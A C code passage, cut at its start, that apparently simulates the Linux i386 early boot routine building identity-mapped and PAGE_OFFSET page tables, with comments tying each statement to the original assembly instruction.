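	unsigned int page_pde_offset = PAGE_OFFSET >> 20; /* 0xC00 bytes: PDE 768 */
	unsigned int brk = BRK_BASE;		/* %edi: where the next page table goes */
	unsigned int paddr = PTE_IDENT_ATTR;	/* %eax: the pte value being stored */
	unsigned int end = END_PADDR + PTE_IDENT_ATTR;	/* %ebp */
	unsigned int pde = 0;			/* index instead of the %edx pointer */
	int i;

	do {
		unsigned int entry = brk + PDE_IDENT_ATTR;	/* leal PDE_IDENT_ATTR(%edi),%ecx */
		pg_dir[pde] = entry;				/* identity PDE */
		pg_dir[pde + page_pde_offset / 4] = entry;	/* kernel PDE, at PAGE_OFFSET */
		for (i = 0; i < 1024; i++) {	/* movl $1024,%ecx; 11: stosl ... loop 11b */
			page_tables[pde][i] = paddr;
			paddr += 0x1000;	/* addl $0x1000,%eax: next page frame */
		}
		brk += 4096;	/* stosl advanced %edi by 4096 bytes in total */
		pde++;		/* addl $4,%edx */
	} while (paddr < end);	/* cmpl %ebp,%eax; jb 10b */

	/* the asm then stores %edi to _brk_end and %eax >> 12 to max_pfn_mapped */
	printf("built %u page tables, mapped up to pfn 0x%x\n", pde, paddr >> 12);
	return 0;
}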
